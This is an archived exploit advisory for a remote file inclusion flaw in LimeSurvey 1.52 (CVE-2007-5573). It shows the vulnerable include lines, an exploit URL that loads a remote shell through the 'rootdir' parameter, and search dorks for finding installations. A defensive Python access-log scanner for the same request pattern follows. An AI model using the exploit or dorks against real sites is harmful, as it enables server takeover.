LimeSurvey 1.52 - 'language.php' Remote File Inclusion
Author: S.W.A.T.
type: webapps
platform: php
date_added: 2007-10-16
verified: 1
codes: OSVDB-37913;CVE-2007-5573
\\\|///
\\ - - // Xmors Underground Group
( @ @ )
----oOOo--(_)-oOOo--------------------------------------------------
Portal : LimeSurvey (PHPSurveyor) 1.52 plus_build 2007.10.16
Download : http://garr.dl.sourceforge.net/sourceforge/limesurvey/limesurvey152plus_build3386_20071016.zip
Author : S.W.A.T.
HomePage : wWw.XmorS.CoM
Type : Remote File Inclusion
Y! ID : Svvateam
E-Mail : Svvateam@yahoo.com / S.W.4.T@hackermail.com
Dork : "You have not provided a survey identification number"
Dork2 : "LimeSurvey"
----ooooO-----Ooooo--------------------------------------------------
( ) ( )
\ ( ) /
\_) (_/
+---------------------------------------------------------------------------------------------+
Vuln Code :
require_once($rootdir.'/classes/php-gettext/gettext.php');
require_once($rootdir.'/classes/php-gettext/streams.php');
+---------------------------------------------------------------------------------------------+
+---------------------------------------------------------------------------------------------+
Exploit :
http://[TARGET]/[PATH]/classes/core/language.php?rootdir=[-Sh3ll-]
+---------------------------------------------------------------------------------------------+
# milw0rm.com [2007-10-17]
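
A log check for the request pattern shown under "Exploit" above, as an added example (not part of the original advisory or of LimeSurvey's code): it flags direct requests to classes/core/language.php, an include-only file, and records whether rootdir was supplied in the URL. The combined access-log format, the verdict labels and the sample lines are assumptions constructed for illustration.

```python
import posixpath
import re
from urllib.parse import parse_qsl, unquote, urlsplit

TARGET_SUFFIX = "/classes/core/language.php"  # file named in the advisory
PARAM = "rootdir"                             # parameter named in the advisory
REMOTE_SCHEMES = ("http://", "https://", "ftp://")
# Assumed input format: Apache/nginx "combined" access-log lines.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*" \d{3}')

# Constructed sample lines (documentation addresses, reserved .invalid host).
SAMPLE_LOG = """\
192.0.2.10 - - [17/Oct/2007:10:00:01 +0000] "GET /survey/index.php?sid=1 HTTP/1.1" 200 5120
192.0.2.44 - - [17/Oct/2007:10:02:13 +0000] "GET /survey/classes/core/language.php?rootdir=http%3A%2F%2Fhost.invalid%2Fa HTTP/1.1" 200 312
192.0.2.44 - - [17/Oct/2007:10:02:20 +0000] "GET /survey/classes/core/./language.php?%72ootdir=x HTTP/1.1" 200 0
192.0.2.45 - - [17/Oct/2007:10:03:00 +0000] "POST /survey/classes/core/language.php HTTP/1.1" 200 0
"""

def classify(line):
    """Return (client, verdict) for requests that hit language.php, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    client, target = m.groups()
    parts = urlsplit(target)
    # Decode and normalise the path so "/./" and case variants still match.
    path = posixpath.normpath(unquote(parts.path)).lower()
    if not path.endswith(TARGET_SUFFIX):
        return None
    # parse_qsl percent-decodes names and values ("%72ootdir" becomes "rootdir").
    pairs = parse_qsl(parts.query, keep_blank_values=True)
    values = [v for k, v in pairs if k == PARAM]
    if any(v.strip().lower().startswith(REMOTE_SCHEMES) for v in values):
        return client, "rootdir-remote-url"
    if values:
        return client, "rootdir-set"
    # Library file requested directly; POST bodies and cookies are not logged.
    return client, "direct-request"

def scan(log_text):
    """Classify every line of an access log and keep only the hits."""
    return [hit for hit in map(classify, log_text.splitlines()) if hit]

if __name__ == "__main__":
    for client, verdict in scan(SAMPLE_LOG):
        print(client, verdict)
```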